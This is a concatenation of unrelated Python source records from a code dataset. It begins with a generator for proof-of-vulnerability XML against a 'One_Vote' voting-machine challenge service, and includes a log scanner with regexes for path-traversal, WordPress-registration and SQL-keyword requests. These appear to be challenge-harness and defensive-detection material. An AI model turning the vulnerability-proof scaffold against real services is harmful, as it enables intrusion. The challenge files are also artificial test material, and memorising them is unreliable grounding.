self.state['e'].is_configured = True\n\n # set state to NEW\n self.state['e'].set_state('NEW')\n\n # recv ELECTION_CREATED\n self._receive_by_len(self.ELECTION_CREATED, term=CONFIG['TERM'])\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _register_voter(self):\n '''\n Register a new voter\n '''\n 
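_is_menu_id_valid_op above gates each menu id on two conditions: a bitwise overlap between the menu id and the election's state word, and a credential check. A self-contained sketch of that pattern; the state constants here are illustrative assumptions, not the service's real values:

STATE_INIT, STATE_NEW, STATE_OPEN, STATE_CLOSED = 0x01, 0x02, 0x04, 0x08

# Each menu entry carries the state bits in which it is a legal operation.
MENU_BITS = {
    "create_election": STATE_INIT,
    "open_voting": STATE_NEW,
    "vote": STATE_OPEN,
    "results": STATE_CLOSED,
}

def menu_is_valid(menu, state, has_creds):
    # Offered only if the menu's bits overlap the current state AND the
    # caller holds the right credentials -- the same "op and creds" test.
    return bool(MENU_BITS[menu] & state) and has_creds

assert menu_is_valid("vote", STATE_OPEN, True)
assert not menu_is_valid("vote", STATE_CLOSED, True)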
self._process_menu()\n cmd = 0x26\n self._send_str(cmd)\n self.state['e'].authd_user = None\n\n if True == self._is_menu_id_valid_op(cmd):\n self._receive_by_len(self.CREATE_VOTER, term=CONFIG['TERM'])\n\n voter = self.state['e'].make_random_voter()\n # send voter's first and last name\n self._send_first_last_name(voter.f_name, voter.l_name)\n\n # receive \"NEW_UID\" msg and voter's ID\n self._receive_by_len(self.NEW_UID)\n self._receive_by_len(voter.id, delim=CONFIG['DELIM'])\n\n self.state['e'].add_voter(voter)\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _login(self, who=\"VOTER\"):\n '''\n Login either a voter or the election manager, or cause login error\n '''\n self._process_menu()\n cmd = 0x0E\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self.state['e'].authd_user = None\n user = None\n if who is \"ERROR\":\n user = self.state['e'].make_random_voter(is_valid=False)\n elif who is \"E_MGR\":\n user = self.state['e'].e_mgr\n elif who is \"VOTER\":\n user = self.state['e'].get_random_voter()\n if user is None:\n who = \"ERROR\"\n user = self.state['e'].make_random_voter(is_valid=False)\n\n # send creds\n self._receive_prompt_send_answer(self.ENTER_ID, user.id)\n self._receive_prompt_send_answer(self.L_NAME, user.l_name)\n\n if who is \"E_MGR\":\n self._receive_by_len(self.ENTER_AUTH_KEY, term=CONFIG['TERM'])\n self.write(user.auth_key) # auth_key is a Variable()\n\n if who is \"ERROR\":\n self._receive_fail()\n return -1\n else:\n self.state['e'].authd_user = user\n\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _open_voting(self):\n '''\n Set voting to OPEN state\n '''\n self._process_menu()\n cmd = 0x12\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self.state['e'].set_state('OPEN')\n self._receive_by_len(self.ELECTION_OPEN, term=CONFIG['TERM'])\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _close_voting(self):\n '''\n Set voting to CLOSED state\n '''\n self._process_menu()\n cmd = 0x14\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self.state['e'].set_state('CLOSED')\n self._receive_by_len(self.ELECTION_CLOSED, term=CONFIG['TERM'])\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n\n def _election_status(self):\n '''\n Get the status of the election.\n '''\n self._process_menu()\n cmd = 0x16\n self._send_str(cmd)\n\n fmt = \"\\tNumber of voters: {0}\\n\\tNumber of votes: {1}\\n\\tNumber of candidates: {2}\\n\"\n\n if True == self._is_menu_id_valid_op(cmd):\n msg = fmt.format(self.state['e'].get_voter_count(),\n self.state['e'].get_vote_count(),\n self.state['e'].get_candidate_count())\n self._receive_by_len(msg)\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _add_candidate(self):\n '''\n Add a new candidate for the election.\n '''\n self._process_menu()\n cmd = 0x36\n self._send_str(cmd)\n\n\n if True == self._is_menu_id_valid_op(cmd):\n\n if self.state['e'].get_candidate_count() >= self.state['e'].max_candidates:\n self._receive_by_len(self.FULL_CANDIDATES, term=CONFIG['TERM'])\n else:\n self._receive_by_len(self.CREATE_CANDIDATE, term=CONFIG['TERM'])\n\n candidate = self.state['e'].make_random_candidate()\n # send first and last name\n self._send_first_last_name(candidate.f_name, candidate.l_name)\n\n if False:\n self._receive_by_len(self.CANDIDATE_INVALID, term=CONFIG['TERM'])\n\n self._receive_by_len(self.CANDIDATE_ADDED, 
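The `who is "E_MGR"` branches above compare strings by identity rather than value; they behave as intended only because CPython happens to intern these short literals. A quick demonstration of why `==` is the safe comparison (the identity result below is CPython-specific behaviour):

a = "E_MGR"
b = "".join(["E_", "MGR"])   # equal value, but a distinct object in CPython
assert a == b                # value comparison: always correct
assert not (a is b)          # identity comparison: False for this equal string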
term=CONFIG['TERM'])\n self.state['e'].add_candidate(candidate)\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _vote(self):\n '''\n Place a vote.\n '''\n self._process_menu()\n cmd = 0x24\n self._send_str(cmd)\n\n\n if True == self._is_menu_id_valid_op(cmd):\n\n # check to see if there are any candidates to vote for\n if 0 == self.state['e'].get_candidate_count():\n self._receive_by_len(self.EMPTY_CANDIDATES, term=CONFIG['TERM'])\n else:\n # read candidate list\n self._receive_by_len(self.SELECT_CANDIDATE, term=CONFIG['TERM'])\n fmt = \"\\t{0}: {1} {2}\\n\"\n for c in self.state['e'].candidates:\n line = fmt.format(c.id, c.f_name, c.l_name)\n self._receive_by_len(line)\n\n self._receive_by_len(self.CHOOSE, term=CONFIG['TERM'])\n\n # make selection\n c = self.state['e'].get_random_candidate()\n self._send_str(c.id)\n\n # receive voting receipt\n p1 = \"Confirmation #\"\n p2 = \" Vote recorded for candidate: {0} {1}.\\n\"\n\n self._receive_by_len(p1)\n\n vote_id = Variable('voteid{0}'.format(self.state['e'].authd_user.id))\n vote_id.set_slice(0)\n self.read(delim='.', assign=vote_id)\n\n self._receive_by_len(p2.format(c.f_name, c.l_name))\n\n # record vote\n v = Vote(vote_id, self.state['e'].authd_user, c)\n self.state['e'].add_vote(v)\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _voting_results(self):\n '''\n Get the voting results\n '''\n self._process_menu()\n cmd = 0x38\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self._receive_by_len(self.VOTING_RESULTS, term=CONFIG['TERM'])\n\n # check to see if there were any candidates voted for\n if 0 == self.state['e'].get_candidate_count():\n self._receive_by_len(self.ZERO_CANDIDATES, term=CONFIG['TERM'])\n else:\n # calculate voting results\n v_res = self.state['e'].get_voting_results()\n\n # read candidate list\n self._receive_by_len(self.CANDIDATE_ORDER, term=CONFIG['TERM'])\n fmt = \"\\t{0}.\\t{1}\\t\"\n winners = 0\n for (count, c) in v_res:\n if winners >= self.state['e'].num_winners:\n break\n winners += 1\n line = fmt.format(winners, count)\n self._receive_by_len(line)\n # use a wild card recv for the name portion because python and C code\n # have different results from a sort with multiple equal sort-keys.\n self._receive_by_delim(delim='\\n')\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _voter_turnout(self):\n '''\n Get the voter turnout results\n '''\n self._process_menu()\n cmd = 0x48\n self._send_str(cmd)\n fmt = \"\\tNumber of voters: {0}\\n\\tNumber of votes: {1}\\n\";\n\n if True == self._is_menu_id_valid_op(cmd):\n self._receive_by_len(self.VOTER_TURNOUT, term=CONFIG['TERM'])\n\n if 0 is self.state['e'].get_voter_count():\n self._receive_by_len(self.ZERO_VOTERS, term=CONFIG['TERM'])\n else:\n # get counts\n line = fmt.format(self.state['e'].get_voter_count(), self.state['e'].get_vote_count())\n self._receive_by_len(line)\n\n # get all voters\n self._receive_by_len(self.VOTER_ORDER, term=CONFIG['TERM'])\n for i in range(self.state['e'].get_voter_count()):\n # use a wild card recv for the names portion because python and C code\n # have different ordering when reading all values from a hash table.\n self._receive_by_delim(delim='\\n')\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _candidate_summary(self):\n '''\n Get the candidate summary\n '''\n self._process_menu()\n cmd = 0x58\n 
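The wildcard reads above exist because C's qsort gives no ordering guarantee between equal sort keys, while Python's sort is stable. A small illustration of the Python side:

# Python's sort is stable: candidates with equal vote counts keep their
# original relative order, which a C qsort need not preserve.
results = [(3, "alice"), (5, "bob"), (3, "carol")]
ranked = sorted(results, key=lambda r: r[0], reverse=True)
assert ranked == [(5, "bob"), (3, "alice"), (3, "carol")]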
self._send_str(cmd)\n fmt = \"\\tNumber of candidates: {0}\\n\";\n\n if True == self._is_menu_id_valid_op(cmd):\n self._receive_by_len(self.CANDIDATE_SUMMARY, term=CONFIG['TERM'])\n\n if 0 is self.state['e'].get_voter_count():\n self._receive_by_len(self.ZERO_CANDIDATES, term=CONFIG['TERM'])\n else:\n # get counts\n line = fmt.format(self.state['e'].get_candidate_count())\n self._receive_by_len(line)\n\n # read candidate list\n v_res = self.state['e'].get_voting_results()\n self._receive_by_len(self.CANDIDATE_ORDER, term=CONFIG['TERM'])\n fmt = \"\\t{0}.\\t{1}\\t\"\n winners = 0\n for (count, c) in v_res:\n winners += 1\n line = fmt.format(winners, count)\n self._receive_by_len(line)\n # use a wild card recv for the name portion because python and C code\n # have different results from a sort with multiple equal sort-keys.\n self._receive_by_delim(delim='\\n')\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n\n def _quit(self):\n '''\n Quit cleanly\n '''\n self._process_menu()\n cmd = 0x5F\n self._send_str(cmd)\n return -1\n\n def start(self):\n self.state['e'] = Election()\n\n def init_state(self):\n '''\n Process the Election in the INIT state\n '''\n return self._create_election()\n\n def new_state(self):\n '''\n Process the Election in the NEW state\n '''\n # create some voters\n # for i in range(randint(5,15)):\n if 0 != self._register_voter():\n return -1\n\n # add a candidate\n if 0 != self._login(\"E_MGR\") or 0 != self._add_candidate():\n return -1\n\n # open voting\n if 0 != self._login(\"E_MGR\") or 0 != self._open_voting():\n return -1\n\n return 0\n\n def open_state(self):\n '''\n Process the Election in the OPEN state\n '''\n # do some voting\n # for v in range(5, self.state['e'].get_voter_count()):\n if 0 != self._login(\"VOTER\") or 0 != self._vote():\n return -1\n\n return 0\n\n\n def closed_state(self):\n '''\n Process the Election in the CLOSED state\n '''\n # check voting results\n if self.chance(0.5):\n if 0 != self._login(\"E_MGR\") or 0 != self._voting_results():\n return -1\n else:\n if 0 != self._login(\"VOTER\") or 0 != self._voting_results():\n return -1\n\n # check voter turnout\n if 0 != self._login(\"E_MGR\") or 0 != self._voter_turnout():\n return -1\n\n # check candidate summary\n if 0 != self._login(\"E_MGR\") or 0 != self._candidate_summary():\n return -1\n\n return 0\n\n\n\nHEAD=\"\"\"\n\n\nservice\n\n \n\"\"\"\n\nFLAG_READ=\"\"\"\n \"\"\"\n\nFOOT=\"\"\"\n \n voteid12341234\n \n voteid12341234\n\n\n\n\"\"\"\n\nimport os\nif __name__ == \"__main__\":\n POV_DIR=os.path.dirname(__file__)\n POV1_PATH=os.path.join(POV_DIR, 'POV_1c.povxml')\n # POV2_PATH=os.path.join(POV_DIR, 'POV_00002.povxml')\n\n tmpl1 = VotingMachine()\n tmpl1.start()\n tmpl1.init_state()\n tmpl1.new_state()\n tmpl1.open_state()\n tmpl1._quit()\n xml_body1 = HEAD.split(\"\\n\")\n xml_body1 += tmpl1.xml().split(\"\\n\")[5:-7]\n\n xml_body1 += FLAG_READ.split(\"\\n\")\n xml_body1 += tmpl1.xml().split(\"\\n\")[-7:-2]\n xml_body1 += FOOT.split(\"\\n\")\n combined_xml1 = \"\\n\".join(xml_body1)\n\n\n # if not os.path.exists(POV_DIR):\n # os.mkdir(POV_DIR)\n\n with open(POV1_PATH, 'w') as f:\n f.write(combined_xml1)\n\n # with open(POV2_PATH, 'w') as f:\n # f.write(combined_xml2)\n\n","sub_path":"challenges/One_Vote/support/genpov/genpov_1c.py","file_name":"genpov_1c.py","file_ext":"py","file_size_in_byte":25008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"551177341","text":"# -*- coding: 
utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contributors', '0005_auto_20150208_1230'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='identifier',\n name='name',\n field=models.TextField(max_length=256),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='identifier',\n name='type',\n field=models.CharField(max_length=16, choices=[('login', 'Debian/Alioth login'), ('fpr', 'OpenPGP key fingerprint'), ('email', 'Email address'), ('url', 'URL'), ('wiki', 'Wiki name')]),\n preserve_default=True,\n ),\n ]\n","sub_path":"contributors/migrations/0006_auto_20150817_1644.py","file_name":"0006_auto_20150817_1644.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"515695407","text":"import random\nimport numpy as np\nfrom collections import deque\n\nclass User:\n def __init__(self, name):\n self.name = name\n\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n print(\"WARNING: You cannot be friends with yourself\")\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n print(\"WARNING: Friendship already exists\")\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n\n def populate_graph(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n # Add users\n for i in range(num_users):\n self.add_user(f\"User {i+1}\")\n\n # O(n) solution\n \n # Generate the number of friends each user will have\n # Uses a normal distribution to keep the average correct\n # The scale parameter is standard deviation\n friend_counts = np.random.normal(loc=avg_friendships,\n scale=avg_friendships/2,\n size=num_users)\n friend_counts = friend_counts.astype(int)\n\n # The set of all users, used in the next loop\n all_users = set(self.users.keys())\n\n # Generate the given number of friends for each user\n for u in all_users:\n # Check if enough friendships have already been made with this user\n count = friend_counts[u-1] - len(self.friendships[u])\n if count <= 0:\n continue\n\n # Get set of possible friends for this user\n possible = all_users.copy()\n possible.remove(u)\n\n # remove the friendships already made with this user\n possible = possible.difference(self.friendships[u])\n\n # Pick a random sample of those possible friends\n friends = random.sample(possible, count)\n\n # Create that those friendships\n for f in friends:\n self.add_friendship(u, f)\n\n # Original O(n^2) solution\n\n # # Generate all possible friendships combinations\n # # Avoid duplicates by ensuring 1st < 2nd\n # possible = []\n # for user_id in self.users:\n # for 
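The O(n) population strategy above draws each user's friend count from a normal distribution centred on the requested average, then truncates to int. A minimal check of that sampling step:

import numpy as np

num_users, avg_friendships = 1000, 10
counts = np.random.normal(loc=avg_friendships,
                          scale=avg_friendships / 2,
                          size=num_users).astype(int)
# Truncation biases the mean slightly low, and negative draws are possible
# in the tail -- which is why the loop above skips counts <= 0.
print(counts.mean())   # typically close to 10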
friend_id in range(user_id+1, self.last_id+1):\n # possible.append((user_id, friend_id))\n\n # # Shuffle friendships\n # random.shuffle(possible)\n\n # # Create N friendships, where N = num_users * avg_friendships / 2\n # for i in range(num_users * avg_friendships // 2):\n # self.add_friendship(*possible[i])\n\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n\n The key is the friend's ID and the value is the path.\n \"\"\"\n \n # Perform breadth first search and save shortest path to each node\n # Start a queue with the initial user_id \n visited = {user_id : [user_id]}\n q = deque()\n q.append(user_id)\n\n while len(q) > 0: # while the queue is not empty\n current = q.popleft()\n for friend in self.friendships[current]: # check each friend\n # if we haven't already found a path to this friend...\n if friend not in visited:\n # the shortest path is the path to current + friend\n visited[friend] = visited[current].copy()\n visited[friend].append(friend)\n \n q.append(friend) # add this friend to the queue\n\n return visited\n\n\nif __name__ == '__main__':\n sg = SocialGraph()\n sg.populate_graph(100, 10)\n print(\"Friendships:\")\n print(sg.friendships)\n connections = sg.get_all_social_paths(1)\n print(\"Connections to id 1:\")\n print(connections)\n","sub_path":"projects/social/social.py","file_name":"social.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454053749","text":"import csv, json, geocoder, datetime, time\n\nformationTypes = [\n \"ORGANIZATION\",\n \"INCORPORATION\",\n \"INCORPORATED-B\"\n]\n\norganizationTypes = [\n \"ORG REPORT\",\n]\n\nconversionTypes = [\n \"CONVERSION-B\",\n \"ELECT B-STATUS\"\n]\n\nstructureTypes = {\n \"CIS\" : \"Domestic Stock Corporation\",\n \"LC\" : \"Domestic LLC\",\n \"BCORP\" : \"Domestic Benefit Corporation\"\n}\n\nwith open(\"bcorp-papertrail.csv\", \"r\") as dataFile:\n csvReader = csv.DictReader(dataFile)\n raw = [{k: (row[k]).strip() for k in row.keys()} for row in csvReader]\n\ndataObj = {}\n\nfor id in set([row[\"id_bus\"] for row in raw]):\n dataObj[id] = {\n \"name\" : False,\n \"formation\" : False,\n \"organization\" : False,\n \"conversion\" : False,\n \"address\" : False\n }\n\n# formation values\nfor formation in [row for row in raw if row[\"tx_certif\"] in formationTypes]:\n # dataObj[formation[\"id_bus\"]][\"name\"] = formation[\"nm_name\"].title()\n dataObj[formation[\"id_bus\"]][\"name\"] = formation[\"nm_name\"]\n\n dataObj[formation[\"id_bus\"]][\"formation\"] = {\n \"type\" : structureTypes[formation[\"cd_trans_type\"]],\n \"date\" : datetime.datetime.strptime(formation[\"tm_filing\"], \"%Y%m%d\").strftime(\"%b %d, %Y\")\n }\n\n # address\n if formation[\"ad_zip5\"] == \"\":\n dataObj[formation[\"id_bus\"]][\"address\"] = False\n else:\n dataObj[formation[\"id_bus\"]][\"address\"] = {\n \"street1\" : formation[\"ad_str1\"].title(),\n \"street2\" : formation[\"ad_str2\"].title(),\n \"street3\" : formation[\"ad_str3\"].title(),\n \"city\" : formation[\"ad_city\"].title(),\n \"zip\" : formation[\"ad_zip5\"],\n \"state\" : formation[\"ad_st\"]\n }\n # geocode address\n geoAddress = [\n dataObj[formation[\"id_bus\"]][\"address\"][\"street1\"]\n ]\n\n if dataObj[formation[\"id_bus\"]][\"address\"][\"street2\"] != \"\":\n 
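get_all_social_paths above is a textbook breadth-first search: because BFS visits nodes in rings of increasing distance, the first path recorded to each node is a shortest one. The same idea on a bare adjacency dict:

from collections import deque

def shortest_paths(graph, start):
    # graph: {node: set(neighbours)}; returns {node: shortest path list}.
    visited = {start: [start]}
    q = deque([start])
    while q:
        cur = q.popleft()
        for nxt in graph[cur]:
            if nxt not in visited:
                # First time we reach nxt: extend the shortest path to cur.
                visited[nxt] = visited[cur] + [nxt]
                q.append(nxt)
    return visited

assert shortest_paths({1: {2}, 2: {1, 3}, 3: {2}}, 1)[3] == [1, 2, 3]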
geoAddress.append(dataObj[formation[\"id_bus\"]][\"address\"][\"street2\"])\n\n if dataObj[formation[\"id_bus\"]][\"address\"][\"street3\"] != \"\":\n geoAddress.append(dataObj[formation[\"id_bus\"]][\"address\"][\"street3\"])\n\n geoAddress +=[\n dataObj[formation[\"id_bus\"]][\"address\"][\"city\"],\n dataObj[formation[\"id_bus\"]][\"address\"][\"state\"],\n dataObj[formation[\"id_bus\"]][\"address\"][\"zip\"]\n ]\n\n # print(geoAddress)\n geoAddress = \",\".join(geoAddress)\n # print(geoAddress)\n # geocoder values\n geocode = geocoder.google(geoAddress)\n time.sleep(1)\n # print(geocode.latlng)\n dataObj[formation[\"id_bus\"]][\"address\"][\"geocode\"] = geocode.latlng\n\n# organization values\nfor organization in [row for row in raw if row[\"tx_certif\"] in organizationTypes]:\n dataObj[organization[\"id_bus\"]][\"organization\"] = {\n \"date\" : datetime.datetime.strptime(organization[\"tm_filing\"], \"%Y%m%d\").strftime(\"%b %d, %Y\")\n }\n\n# conversion values\nfor conversion in [row for row in raw if row[\"tx_certif\"] in conversionTypes]:\n dataObj[conversion[\"id_bus\"]][\"conversion\"] = {\n \"date\" : datetime.datetime.strptime(conversion[\"tm_filing\"], \"%Y%m%d\").strftime(\"%b %d, %Y\")\n }\n\n# convert object to list of objects - ditch business ID's\ndata = []\n\nfor id in dataObj:\n data.append(dataObj[id])\n\nwith open(\"dataObject.json\", \"w\") as outputFile:\n json.dump(dataObj, outputFile)\n\nwith open(\"data.json\", \"w\") as outputFile:\n json.dump(data, outputFile)","sub_path":"bcorp-table/static/data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21824868","text":"#셀레니움 연습하기\nfrom selenium import webdriver\nimport time\n\n#1. 웹드라이버 켜기\ndriver = webdriver.Chrome(\"./chromedriver\")\n#2. 네이버 지도 접속하기\ndriver.get(\"https://v4.map.naver.com/\")\n\ndriver.find_elements_by_css_selector(\"button.btn_close\")[1].click()\n#3. 검색창에 검색어 입력하기 // input#search-input\nsearch_box = driver.find_element_by_css_selector(\"input#search-input\")\nsearch_box.send_keys(\"치킨\")\n#4. 검색버튼 누르기 button.spm\nsearch_button = driver.find_element_by_css_selector(\"button.spm\")\nsearch_button.click()\n#5. 
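The filing dates above are reformatted from compact YYYYMMDD stamps via strptime/strftime; a one-line check (assuming an English locale for %b):

import datetime

stamp = datetime.datetime.strptime("20160301", "%Y%m%d")
assert stamp.strftime("%b %d, %Y") == "Mar 01, 2016"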
검색결과 확인하기\n\n\n\n# 컨테이너 dl.lsnx_det\n# 가게이름 dt > a\n# 가게주소 dd.addr\n# 전화번호 dd.tel\nfor n in range(1,6):\n # 지연시간\n time.sleep(1)\n\n stores = driver.find_elements_by_css_selector(\"dl.lsnx_det\")\n\n for s in stores:\n name = s.find_element_by_css_selector(\"dt > a\").text\n address = s.find_element_by_css_selector(\"dd.addr\").text\n #tel = s.find_element_by_css_selector(\"dd.tel\").text\n print(name)\n print(address)\n print(\"=\"*50)\n\n # 페이지버튼 div.paginate > *\n page_bar = driver.find_elements_by_css_selector(\"div.paginate > *\")\n page_bar[n+1].click()","sub_path":"웹크롤링/week6/week6_3.py","file_name":"week6_3.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650712391","text":"import platform\nimport os.path\nimport shutil\nimport send2trash\nimport re\nfrom zipfile import ZipFile\nimport zipfile\n\ndef deleteFile():\n my_path = getPath()\n temp_file = \"\"\n fileNameRegex = re.compile(r'([a-z_]*\\.com)')\n access_logs_path = os.path.join(my_path,\"access_logs\")\n\n with open(os.path.join(my_path,'matches.txt'),'r') as text:\n for line in text:\n temp_file = temp_file + line\n \n for line in temp_file:\n fileName = fileNameRegex.findall(temp_file)\n\n for root, dirs, files in os.walk(access_logs_path):\n for file in files:\n if file not in fileName:\n send2trash.send2trash(os.path.join(root,file))\n send2trash.send2trash(root)\n\ndef final_zip():\n my_path = getPath()\n zip = zipfile.ZipFile(\"text_files\\\\results.zip\", \"w\")\n\n for root, subdirs, files in os.walk(my_path):\n zip.write(root)\n for file in files:\n zip.write(os.path.join(root,file))\n\ndef getRoot():\n my_system = platform.system()\n\n if my_system == \"Windows\":\n root_fs = \"C:\\\\\"\n else:\n root_fs = \"/\"\n\n final_filepath = os.path.join(root_fs)\n\n return final_filepath\n\ndef getCopyPath():\n my_system = platform.system()\n\n if my_system == \"Windows\":\n root_fs = \"C:\\\\\"\n else:\n root_fs = \"/\"\n\n final_filepath = os.path.join(root_fs, \"log_processing\")\n\n return final_filepath\n\ndef getPath():\n my_system = platform.system()\n\n if my_system == \"Windows\":\n root_fs = \"C:\\\\\"\n else:\n root_fs = \"/\"\n\n final_filepath = os.path.join(root_fs, \"logs\")\n\n return final_filepath\n\ndef moveFile():\n my_path = getPath()\n my_root = getRoot()\n\n file_to_move = input(\"What is the name of the file you would like to move? \")\n folder_to_move_to = input(\"What is the name of the folder you would like the file to be moved to? 
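The scraper above paces itself with fixed time.sleep(1) calls between page clicks. An explicit wait, sketched below with Selenium's standard WebDriverWait API, blocks only until the result containers actually render; this is an alternative approach, not the original author's code:

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def wait_for_results(driver, timeout=10):
    # Block until at least one "dl.lsnx_det" store container is present,
    # instead of sleeping a fixed second per page.
    return WebDriverWait(driver, timeout).until(
        EC.presence_of_all_elements_located((By.CSS_SELECTOR, "dl.lsnx_det")))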
\")\n\n shutil.move(os.path.join(my_path,file_to_move), os.path.join(my_root,folder_to_move_to))\n\ndef readLogs():\n\n temp_data_set = \"\"\n filtered_IP_list = []\n filtered_file_list = []\n\n my_path = getPath()\n\n access_logs_path = os.path.join(my_path,\"access_logs\")\n\n for root, subdirs, files in os.walk(access_logs_path):\n for file in files:\n with open(os.path.join(root,file),'r') as logFile:\n for line in logFile:\n fileFound = re.search(r'(\\.)(\\.)(/)', line)\n if fileFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n wpFound = re.search(r'(/)(wp-login)(\\.)(php)(\\?)(action=register)', line)\n if wpFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n HTTPFound = re.search(r'\\b(\\d)(\\d)(\\d)?(\\d)?(\\d)?( )(403)\\b', line)\n if HTTPFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n selectFound = re.search(r'(select)', line)\n if selectFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n installFound = re.search(r'(install)', line)\n if installFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n\n IPRegex = re.compile(r'\\b(\\d)(\\d)?(\\d)?(\\.)(\\d)(\\d)?(\\d)?(\\.)(\\d)(\\d)?(\\d)?(\\.)(\\d)(\\d)?(\\d)?\\b')\n fileNameRegex = re.compile(r'([^\"]\\B [a-z_]*\\.com)')\n IPList = IPRegex.findall(temp_data_set)\n fileList = fileNameRegex.findall(temp_data_set)\n for IP in IPList:\n temp_IP = \"\"\n for item in IP:\n temp_IP = temp_IP + str(item.lstrip())\n if temp_IP not in filtered_IP_list:\n filtered_IP_list.append(temp_IP)\n for fileName in fileList:\n temp_file = \"\"\n for item in fileName:\n temp_file = temp_file + str(item.lstrip())\n if temp_file not in filtered_file_list:\n filtered_file_list.append(temp_file)\n\n final_info = dict(zip(filtered_IP_list, filtered_file_list))\n with open(os.path.join(my_path,'matches.txt'), 'w') as file:\n for key in final_info.items():\n file.write(\"%s,%s\\n\" % key)\n \ndef renameFile():\n my_path = getPath()\n my_return = os.walk(os.path.join(my_path,\"access_logs\"))\n\n for item in my_return:\n for filename in item[2]:\n temp_filename = \"processed_\" + filename\n shutil.move(os.path.join(item[0], filename), os.path.join(item[0], temp_filename))\n \ndef unzipFile():\n my_root = getRoot()\n \n os.chdir('week3\\\\assignment')\n\n if os.path.isdir(os.path.join(my_root, \"logs\")):\n with ZipFile('text_files\\\\access_logs.zip', 'r') as zipObj:\n zipObj.extractall(os.path.join(my_root, 'logs'))\n else:\n os.makedirs(os.path.join(my_root, 'logs'))\n with ZipFile('text_files\\\\access_logs.zip', 'r') as zipObj:\n zipObj.extractall(os.path.join(my_root, 'logs'))\n ","sub_path":"week3/assignment/functions/filesystem_functions.py","file_name":"filesystem_functions.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"123353675","text":"# import urllib\n\n# from django.core.urlresolvers import reverse\n# from django.shortcuts import redirect\n# from django.views.generic.base import View, TemplateView\n# from django.http import HttpResponse\n# import socket\n\n# class LoginView(View):\n \n# def get(self, request, *args, **kwargs):\n# # check if user is already logged in\n# # if not, check if there is SSO info, and 
if so, log user in (maybe have to save info?)\n# print('in get')\n# print(request.GET.get('ReturnUrl'))\n# if (request.user.is_anonymous()):\n# print('--- cookies ---')\n# print(request.COOKIES)\n# print('get2')\n# print(settings.SESSION_COOKIE_NAME)\n# sso_return_url = request.GET.get('ReturnUrl')\n# print(sso_return_url)\n# if sso_return_url:\n# redirect_to = 'home'\n# else:\n# # If there is no login info, then redirect to the SSO\n# base_url = \"https://www.hospitalmedicine.org/Web/SHMLogin.aspx\"\n \n \n# local_url = \"https://django-sso-climberwb.c9users.io\"\n# return_url = \"/SSO/Copy_of_SSOLogin.aspx?HMRedirect=%s%s?ReturnUrl=/\" % (local_url, reverse('login'))\n# query_params = {\n# 'LoginRedirect': 'true',\n# 'returnUrl': return_url,\n# }\n \n# redirect_to = '%s?%s' % (base_url, urllib.urlencode(query_params))\n# return redirect(redirect_to)\n# else:\n# return redirect('home')\n \n \n# class HomeView(TemplateView):\n# template_name = 'sso_login/home.html'\n \n# def get_context_data(self, **kwargs):\n# print('in get_context_data')\n# print(self)\n# # TODO maybe remove this 